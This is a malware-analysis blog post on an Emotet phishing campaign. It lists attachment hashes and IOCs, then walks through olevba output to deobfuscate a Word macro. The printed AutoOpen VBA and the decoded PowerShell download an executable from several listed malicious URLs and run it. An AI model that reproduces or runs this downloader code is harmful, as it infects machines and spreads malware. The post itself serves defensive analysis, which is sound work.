Looking through the email filters in on the 18th of September, I managed to find a small batch of emotet emails from the same sender. The emails themselves tried to spoof email addresses, but Outlook ended up displaying both emails (the spoof and the true sender). Looking through the small batch of emails, there were 2 different sets of hashes for the attachments. Below is the table showing the MD5 hashes associated with the maldoc:
MD5 (Invoice_No_K57935.doc) = 91934748cd49981fe7921b1d46251cfc MD5 (Invoice_No_R80313.doc) = cc177a87b917fa703b9c77873453817a MD5 (Invoice_No_R80313[1].doc) = cc177a87b917fa703b9c77873453817a MD5 (Invoice_No_R80313[2].doc) = cc177a87b917fa703b9c77873453817a MD5 (Invoice_No_R80313[3].doc) = cc177a87b917fa703b9c77873453817a MD5 (Invoice_No_R80313[4].doc) = cc177a87b917fa703b9c77873453817a MD5 (Invoice_No_R80313[5].doc) = cc177a87b917fa703b9c77873453817a
The artifacts from this can be found over in my Github found here.
Another security researcher that has been activly maintaining emotet data (http://twitter.com/ps66uk/status/1042004723866509313) and the IP addresses/IOCs had already documented the below IPs/IOCs in a Pastebin link found within the tweet mentioned above.
The artifacts left by the maldocs have the same hash and seem to renamed as it executes from parent to child. Initially the first file (zhniYMNIL.exe) was located in the C:\Users\Public folder and ran from there. Shortly thereafter, it killed itself, spawned another version of itself, which then killed itself and spawned two more children processes. This new process was called “srvloada.exe” and was run from the “C:\Users\Bill\AppData\Local\Microsoft\Windows” path. This is also the process that is responsible for talking back to the C2 which can be found in Wireshark.
IOCs
——-
23.229.168.200 / hxxp://abporter.org/zhniYMNIL
hxxp://bearinmindstrategies.com/of7Cpb8
hxxp://ondacapital.es/EwCyzzc
hxxp://landspa.ir/Nl9U64Eg0
hxxp://shoshana.ge/QwlUmzzVaF
69.70.248.98:8443 (TCP)
190.189.12.16:8080 (TCP)
96.242.246.128 (TCP)
Deobfuscating the script
————————-
Instead of using the old tried-and-true method of running the maldocs through OfficeMalScanner and looking at the script files that it outputs and then trying to clean them up, I decided to try out another tool, OLETOOLS (http://www.decalage.info/python/oletools) and in particular “olevba.” Below are the steps that I used to deobfuscate the script (or at least make it readable). One thing to note is that the current string of emotet maldocs all have the same basic script layout. So these types of maldocs are fairly easy to decipher.
First, I started off by pointing “olevba” to the maldoc using the “deobf” switch. The “deobf” switch attempts to deobfuscate the VBA code that it finds. This does not take care of the CHAR methods typically found in these scripts. Once I did that I got the following text:
olevba Invoice_No_R80313.doc --deobf
olevba 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS----V Invoice_No_R80313.doc
===============================================================================
FILE: Invoice_No_R80313.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO DBKDWFuIhNwzVw.cls
in file: Invoice_No_R80313.doc - OLE stream: u'Macros/VBA/DBKDWFuIhNwzVw'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
Const vjKOKlU = 0
Dim driCYS(2)
driCYS(0) = Right(JVFjZ, 862)
driCYS(1) = MidB(ZojZHrv, 809, 684)
Dim MIbjca(3)
MIbjca(0) = Right(JVFjZ, 862)
MIbjca(1) = Mid(EOqjzdt, 323, 516)
MIbjca(2) = Right(JVFjZ, 862)
Dim ILVJd(5)
ILVJd(0) = Right(JVFjZ, 862)
ILVJd(1) = MidB(ZojZHrv, 809, 684)
ILVJd(2) = Left(Xdurj, 100)
ILVJd(3) = Mid(EOqjzdt, 323, 516)
ILVJd(4) = Left(Xdurj, 100)
Dim huziw(4)
huziw(0) = Left(Xdurj, 100)
huziw(1) = MidB(ZojZHrv, 809, 684)
huziw(2) = Left(Xdurj, 100)
huziw(3) = MidB(ZojZHrv, 809, 684)
Dim Mnfjzi(5)
Mnfjzi(0) = Left(Xdurj, 100)
Mnfjzi(1) = Right(JVFjZ, 862)
Mnfjzi(2) = MidB(ZojZHrv, 809, 684)
Mnfjzi(3) = Right(JVFjZ, 862)
Mnfjzi(4) = Left(Xdurj, 100)
Shell@ SdYTp + aTlfHVjQIvf + zXOhiibnrP, CInt(vjKOKlU)
Dim RLtFPZ(4)
RLtFPZ(0) = Left(Xdurj, 100)
RLtFPZ(1) = Left(Xdurj, 100)
RLtFPZ(2) = Right(JVFjZ, 862)
RLtFPZ(3) = MidB(ZojZHrv, 809, 684)
Dim CAYIzk(4)
CAYIzk(0) = MidB(ZojZHrv, 809, 684)
CAYIzk(1) = Mid(EOqjzdt, 323, 516)
CAYIzk(2) = Left(Xdurj, 100)
CAYIzk(3) = Mid(EOqjzdt, 323, 516)
End Sub
-------------------------------------------------------------------------------
VBA MACRO HJXWrpqHU.bas
in file: Invoice_No_R80313.doc - OLE stream: u'Macros/VBA/HJXWrpqHU'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function SdYTp()
Dim FXnVM(3)
FXnVM(0) = Mid(EOqjzdt, 323, 516)
FXnVM(1) = MidB(ZojZHrv, 809, 684)
FXnVM(2) = Right(JVFjZ, 862)
Dim kiDRl(3)
kiDRl(0) = Left(Xdurj, 100)
kiDRl(1) = Left(Xdurj, 100)
kiDRl(2) = Mid(EOqjzdt, 323, 516)
qoUEHwZz = Format(Chr(3 + 9 + 3 + 0 + 84)) + "md /V^:ON/" + Format(Chr(2 + 6 + 2 + 0 + 57)) + Format(Chr(1 + 3 + 1 + 0 + 29)) + "^se^t ^Ke= ^" + " ^ ^ ^ ^ ^ ^ }" + "^}{h" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ta" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "};^kaer^b^;zkw$ ^" + "m^e^tI^-^e^kovn^I;" + ")zk^w^$ ,^Z^UV$(^eliFdao" + "^ln^woD^.a^z^l${" + "^yrt{)j^FV$" + "^ ni ZUV$(^h"
Dim GJIzU(3)
GJIzU(0) = Right(JVFjZ, 862)
GJIzU(1) = Left(Xdurj, 100)
GJIzU(2) = Right(JVFjZ, 862)
Dim YYIwF(4)
YYIwF(0) = Right(JVFjZ, 862)
YYIwF(1) = Left(Xdurj, 100)
YYIwF(2) = Mid(EOqjzdt, 323, 516)
YYIwF(3) = MidB(ZojZHrv, 809, 684)
Dim VPsSo(3)
VPsSo(0) = Left(Xdurj, 100)
VPsSo(1) = MidB(ZojZHrv, 809, 684)
VPsSo(2) = Right(JVFjZ, 862)
bYUpXlw = Format(Chr(3 + 9 + 3 + 0 + 84)) + "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ q^pv$;)'^@" + "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + "Q/^eg.^ana^h^s^o^h^s//^:p" + "^t^t^h@0gE4^6U^9^lN/ri^." + "^ap^sdn^al//^:ptt^h@" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "wE" + "/^s^e^.^la^t^i^pa" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^a^dno//^:" + "^ptth^@^8^b^p" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" + Format(Chr(3 + 9 + 3 + 0 + 84)) + ".se" + "^ige^tarts^dni^mnir"
Dim TmMLp(5)
TmMLp(0) = Mid(EOqjzdt, 323, 516)
TmMLp(1) = Left(Xdurj, 100)
TmMLp(2) = Left(Xdurj, 100)
TmMLp(3) = MidB(ZojZHrv, 809, 684)
TmMLp(4) = Left(Xdurj, 100)
Dim FrnWaj(3)
FrnWaj(0) = Left(Xdurj, 100)
FrnWaj(1) = Left(Xdurj, 100)
FrnWaj(2) = Right(JVFjZ, 862)
WzHqWJWbBXQ = "a^e^b//^:^pt^th^@^LIN^" + "M^Y^in^hz/" + "gr^o.re^t" + "r^o^pb^a//:^pt^th'" + "=^jFV^$^;^tn^eil" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "b^eW.^teN" + " t" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^e^jb^o-^w^e" + "n^=azl^$ ^lleh^srewop&&^f" + "or /^L %^D ^in (3^6^7;^-1" + "^;^0)^d^o s^e^t ^" + "if=!^if!!^Ke" + ":~%^D,1!&&i^f" + " %^D ^l^ss ^1 " + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^" + "a^l^l %^if:^*^if^!="
Dim LWJFWj(4)
LWJFWj(0) = Left(Xdurj, 100)
LWJFWj(1) = Right(JVFjZ, 862)
LWJFWj(2) = MidB(ZojZHrv, 809, 684)
LWJFWj(3) = Mid(EOqjzdt, 323, 516)
Dim bwuVfz(2)
bwuVfz(0) = Right(JVFjZ, 862)
bwuVfz(1) = Right(JVFjZ, 862)
Dim zbYtJ(4)
zbYtJ(0) = Left(Xdurj, 100)
zbYtJ(1) = MidB(ZojZHrv, 809, 684)
zbYtJ(2) = Right(JVFjZ, 862)
zbYtJ(3) = Mid(EOqjzdt, 323, 516)
Dim vsQWWO(3)
vsQWWO(0) = Right(JVFjZ, 862)
vsQWWO(1) = Right(JVFjZ, 862)
vsQWWO(2) = Left(Xdurj, 100)
Dim wXKAfS(4)
wXKAfS(0) = Mid(EOqjzdt, 323, 516)
wXKAfS(1) = Right(JVFjZ, 862)
wXKAfS(2) = Right(JVFjZ, 862)
wXKAfS(3) = Mid(EOqjzdt, 323, 516)
CwjjZpQsN = "%" + Format(Chr(1 + 3 + 1 + 0 + 29)) + ""
SdYTp = qoUEHwZz + bYUpXlw + WzHqWJWbBXQ + CwjjZpQsN
Dim VILOp(2)
VILOp(0) = Right(JVFjZ, 862)
VILOp(1) = Right(JVFjZ, 862)
End Function
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings (use option --deobf to |
| | | deobfuscate) |
| Suspicious | Shell | May run an executable file or a system |
| | | command |
| Suspicious | VBA obfuscated | VBA string expressions were detected, |
| | Strings | may be used to obfuscate strings |
| | | (option --decode to see all) |
| VBA string | cmd /V^:ON/ | (Chr(3 + 9 + 3 + 0 + 84)) + "md |
| | | /V^:ON/" |
| VBA string | C | (Chr(2 + 6 + 2 + 0 + 57)) |
| VBA string | "^se^t ^Ke= ^ ^ | (Chr(1 + 3 + 1 + 0 + 29)) + "^se^t ^Ke= |
| | ^ ^ ^ ^ ^ }^}{h | ^" + " ^ ^ ^ ^ ^ ^ }" + "^}{h" |
| VBA string | c^ta | (Chr(3 + 9 + 3 + 0 + 84)) + "^ta" |
| VBA string | c};^kaer^b^;zkw$ ^m^ | (Chr(3 + 9 + 3 + 0 + 84)) + |
| | e^tI^-^e^kovn^I;)zk^ | "};^kaer^b^;zkw$ ^" + |
| | w^$ ,^Z^UV$(^eliFdao | "m^e^tI^-^e^kovn^I;" + ")zk^w^$ |
| | ^ln^woD^.a^z^l${^yrt | ,^Z^UV$(^eliFdao" + "^ln^woD^.a^z^l${" |
| | {)j^FV$^ ni ZUV$(^h | + "^yrt{)j^FV$" + "^ ni ZUV$(^h" |
| VBA string | caerof;'^e^xe^.^'^+q | (Chr(3 + 9 + 3 + 0 + 84)) + |
| | ^pv$+'\^'^+ | "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" |
| VBA string | c^ilbu^p:vne$=^z^kw$ | (Chr(3 + 9 + 3 + 0 + 84)) + |
| | ;^'^45^6^' =^ q^pv$; | "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ |
| | )'^@'(^t^ilp^S^.^'^F | q^pv$;)'^@" + |
| | ^aV^z^zm^U^lwQ/^eg.^ | "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + |
| | ana^h^s^o^h^s//^:p^t | "Q/^eg.^ana^h^s^o^h^s//^:p" + |
| | ^t^h@0gE4^6U^9^lN/ri | "^t^t^h@0gE4^6U^9^lN/ri^." + |
| | ^.^ap^sdn^al//^:ptt^ | "^ap^sdn^al//^:ptt^h@" |
| | h@ | |
| VBA string | cz^zy | (Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" |
| VBA string | CwE/^s^e^.^la^t^i^pa | (Chr(2 + 6 + 2 + 0 + 57)) + "wE" + |
| | | "/^s^e^.^la^t^i^pa" |
| VBA string | c^a^dno//^:^ptth^@^8 | (Chr(3 + 9 + 3 + 0 + 84)) + |
| | ^b^p | "^a^dno//^:" + "^ptth^@^8^b^p" |
| VBA string | C^7f^o/mo | (Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" |
| VBA string | c.se^ige^tarts^dni^m | (Chr(3 + 9 + 3 + 0 + 84)) + ".se" + |
| | nir | "^ige^tarts^dni^mnir" |
| VBA string | a^e^b//^:^pt^th^@^LI | "a^e^b//^:^pt^th^@^LIN^" + "M^Y^in^hz/" |
| | N^M^Y^in^hz/gr^o.re^ | + "gr^o.re^t" + "r^o^pb^a//:^pt^th'" + |
| | tr^o^pb^a//:^pt^th'= | "=^jFV^$^;^tn^eil" |
| | ^jFV^$^;^tn^eil | |
| VBA string | Cb^eW.^teN t | (Chr(2 + 6 + 2 + 0 + 57)) + "b^eW.^teN" |
| | | + " t" |
| VBA string | c^e^jb^o-^w^en^=azl^ | (Chr(3 + 9 + 3 + 0 + 84)) + |
| | $ ^lleh^srewop&&^for | "^e^jb^o-^w^e" + "n^=azl^$ |
| | /^L %^D ^in | ^lleh^srewop&&^f" + "or /^L %^D ^in |
| | (3^6^7;^-1^;^0)^d^o | (3^6^7;^-1" + "^;^0)^d^o s^e^t ^" + |
| | s^e^t ^if=!^if!!^Ke: | "if=!^if!!^Ke" + ":~%^D,1!&&i^f" + " |
| | ~%^D,1!&&i^f %^D | %^D ^l^ss ^1 " |
| | ^l^ss ^1 | |
| VBA string | c^a^l^l | (Chr(3 + 9 + 3 + 0 + 84)) + "^" + |
| | %^if:^*^if^!= | "a^l^l %^if:^*^if^!=" |
| VBA string | " | (Chr(1 + 3 + 1 + 0 + 29)) + "" |
+------------+----------------------+-----------------------------------------+
The top half of the output are the scripts and such that are attached to the maldoc that olevba was able to detect. This is the same thing that OfficeMalScanner would do. As you can see, most of the code here is junk code. This is easily seen by looking for some of the variables and seeing if they are called multiple times. Generally speaking, if there is only one instance of a variable, then it is most likely junk code. Continuing down through the script, you get to the second macro (HJXWrpqHU.bas) and can start seeing some aspects of code and obfuscation using DOSfuscation (http://www.blackhat.com/docs/asia-18/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level_cmd_obfuscation.pdf) as seen here:
bYUpXlw = Format(Chr(3 + 9 + 3 + 0 + 84)) + "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ q^pv$;)'^@" + "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + "Q/^eg.^ana^h^s^o^h^s//^:p" + "^t^t^h@0gE4^6U^9^lN/ri^." + "^ap^sdn^al//^:ptt^h@" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "wE" + "/^s^e^.^la^t^i^pa" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^a^dno//^:" + "^ptth^@^8^b^p" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" + Format(Chr(3 + 9 + 3 + 0 + 84)) + ".se" + "^ige^tarts^dni^mnir"
If you keep scrolling through the code, you will get to the section that olevba tries to “clean up” the strings and give insight into anything that appears to be suspicious. It is here that I copied all the text from that section, and pasted it into Sublime text editor. I then proceeded to clean up that section by removing the “TYPE” and “DESCRIPTION” columns. So you should end up with something that looks like this.
cmd /V^:ON/
C
"^se^t ^Ke= ^ ^
^ ^ ^ ^ ^ }^}{h
c^ta
c};^kaer^b^;zkw$ ^m^
e^tI^-^e^kovn^I;)zk^
w^$ ,^Z^UV$(^eliFdao
^ln^woD^.a^z^l${^yrt
{)j^FV$^ ni ZUV$(^h
caerof;'^e^xe^.^'^+q
^pv$+'\^'^+
c^ilbu^p:vne$=^z^kw$
;^'^45^6^' =^ q^pv$;
)'^@'(^t^ilp^S^.^'^F
^aV^z^zm^U^lwQ/^eg.^
ana^h^s^o^h^s//^:p^t
^t^h@0gE4^6U^9^lN/ri
^.^ap^sdn^al//^:ptt^
h@
cz^zy
CwE/^s^e^.^la^t^i^pa
c^a^dno//^:^ptth^@^8
^b^p
C^7f^o/mo
c.se^ige^tarts^dni^m
nir
a^e^b//^:^pt^th^@^LI
N^M^Y^in^hz/gr^o.re^
tr^o^pb^a//:^pt^th'=
^jFV^$^;^tn^eil
Cb^eW.^teN t
c^e^jb^o-^w^en^=azl^
$ ^lleh^srewop&&^for
/^L %^D ^in
(3^6^7;^-1^;^0)^d^o
s^e^t ^if=!^if!!^Ke:
~%^D,1!&&i^f %^D
^l^ss ^1
c^a^l^l
%^if:^*^if^!=
"
From here, using Sublime, replace ALL the ‘^’ symbol/spaces/and new lines with nothing. You should get something like this all on one line:
cmd/V:ON/C"setKe=}}{hctac};kaerb;zkw$metI-ekovnI;)zkw$,ZUV$(eliFdaolnwoD.azl${yrt{)jFV$niZUV$(hcaerof;'exe.'+qpv$+'\'+cilbup:vne$=zkw$;'456'=qpv$;)'@'(tilpS.'FaVzzmUlwQ/eg.anahsohs//:ptth@0gE46U9lN/ri.apsdnal//:ptth@czzyCwE/se.latipacadno//:ptth@8bpC7fo/moc.seigetartsdnimniraeb//:ptth@LINMYinhz/gro.retropba//:ptth'=jFV$;tneilCbeW.teNtcejbo-wen=azl$llehsrewop&&for/L%Din(367;-1;0)dosetif=!if!!Ke:~%D,1!&&if%Dlss1call%if:*if!="
From this point, you should be able to see some patterns. Most of the script makes sense, but towards the middle part of it, the obfuscation switches and the text is flipped. For example:
**BEFORE**
------------------
{hctac};kaerb;zkw$metI-ekovnI;)zkw$,ZUV$(eliFdaolnwoD.azl${yrt{)jFV$niZUV$(hcaerof;'exe.'+qpv$+'\'+cilbup:vne$=zkw$;'456'=qpv$;)'@'(tilpS.'FaVzzmUlwQ/eg.anahsohs//:ptth@0gE46U9lN/ri.apsdnal//:ptth@czzyCwE/se.latipacadno//:ptth@8bpC7fo/moc.seigetartsdnimniraeb//:ptth@LINMYinhz/gro.retropba//:ptth'=jFV$;tneilCbeW.teNtcejbo-wen=azl$llehsrewop&&for/L%Din(367;-1;0)dosetif=!if!!Ke:~%D,1!&&if%Dlss1call%if:*if!="
**AFTER**
---------------
"=!fi*:fi%llac1sslD%fi&&!1,D%~:eK!!fi!=fitesod)0;1-;763(niD%L/rof&&powershell$lza=new-objectNet.WebClient;$VFj='http://abporter.org/zhniYMNIL@http://bearinmindstrategies.com/of7Cpb8@http://ondacapital.es/EwCyzzc@http://landspa.ir/Nl9U64Eg0@http://shoshana.ge/QwlUmzzVaF'.Split('@');$vpq='654';$wkz=$env:public+'\'+$vpq+'.exe';foreach($VUZin$VFj){try{$lza.DownloadFile($VUZ,$wkz);Invoke-Item$wkz;break;}catch{
The easiest way to reverse the pattern seen above, I just saved the “BEFORE” text into a file, and that just ran the following command to flip it:
cat <PATH TO THE FILE NAME> | rev